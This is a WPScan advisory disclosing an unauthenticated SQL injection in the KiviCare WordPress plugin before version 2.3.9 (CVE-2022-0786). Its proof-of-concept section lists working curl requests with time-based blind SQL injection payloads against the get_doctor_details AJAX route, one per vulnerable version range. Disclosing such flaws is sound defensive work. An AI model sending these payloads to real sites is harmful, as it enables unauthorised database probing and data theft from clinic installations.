WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

KiviCare < 2.3.9 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users

Proof of Concept

With at least one doctor created via the plugin:

v < 2.3.4
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5bid%5d=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)' --data ''

v < 2.3.5
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D'

v < 2.3.6
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D'

v <= 2.3.8
curl 'http://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b'

Affects Plugins

kivicare-clinic-management-system
Fixed in version 2.3.9

References

CVE
CVE-2022-0786

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
53f493e9-273b-4349-8a59-f2207e8f8f30

Timeline

Publicly Published

2022-05-23 (about 6 months ago)

Added

2022-05-23 (about 6 months ago)

Last Updated

2022-05-23 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin